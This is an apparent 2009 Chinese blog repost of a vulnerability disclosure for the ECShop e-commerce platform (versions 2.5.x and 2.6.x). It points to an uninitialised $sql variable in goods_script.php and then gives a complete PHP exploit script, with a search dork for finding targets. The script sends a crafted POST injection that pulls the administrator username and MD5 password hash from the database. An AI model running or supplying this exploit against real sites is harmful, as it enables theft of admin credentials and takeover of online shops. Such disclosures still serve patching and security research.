ECShop注射漏洞

小杜 — Tue, 24 Mar 2009 08:57:10 +0000

by Ryat
http://bbs.wolvez.org
2009-03-24

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:
if (empty($_GET['type'])) { ... } elseif ($_GET['type'] == 'collection') { ... } $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10); $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

EXP:
#!/usr/bin/php

print_r(' +---------------------------------------------------------------------------+ ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://bbs.wolvez.org dork: "Powered by ECShop" +---------------------------------------------------------------------------+ '); /** * works with register_globals = On */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to ecshop Example: php '.$argv[0].' localhost /ecshop/ +---------------------------------------------------------------------------+ '); exit; }


error_reporting(7);

ini_set('max_execution_time', 0);
$host = $argv[1];

$path = $argv[2];
$resp = send();

preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)

    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");

else

    exit("Exploit Failed!\n");
function send()

{

    global $host, $path;
    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
    $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1\r\n";

    $data .= "Accept: */*\r\n";

    $data .= "Accept-Language: zh-cn\r\n";

    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";

    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

    $data .= "Host: $host\r\n";

    $data .= "Content-Length: ".strlen($cmd)."\r\n";

    $data .= "Connection: Close\r\n\r\n";

    $data .= $cmd;
    $fp = fsockopen($host, 80);

    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp))

        $resp .= fread($fp, 1024);
    return $resp;

}

?>

小杜学习笔记 » 安全

ECShop注射漏洞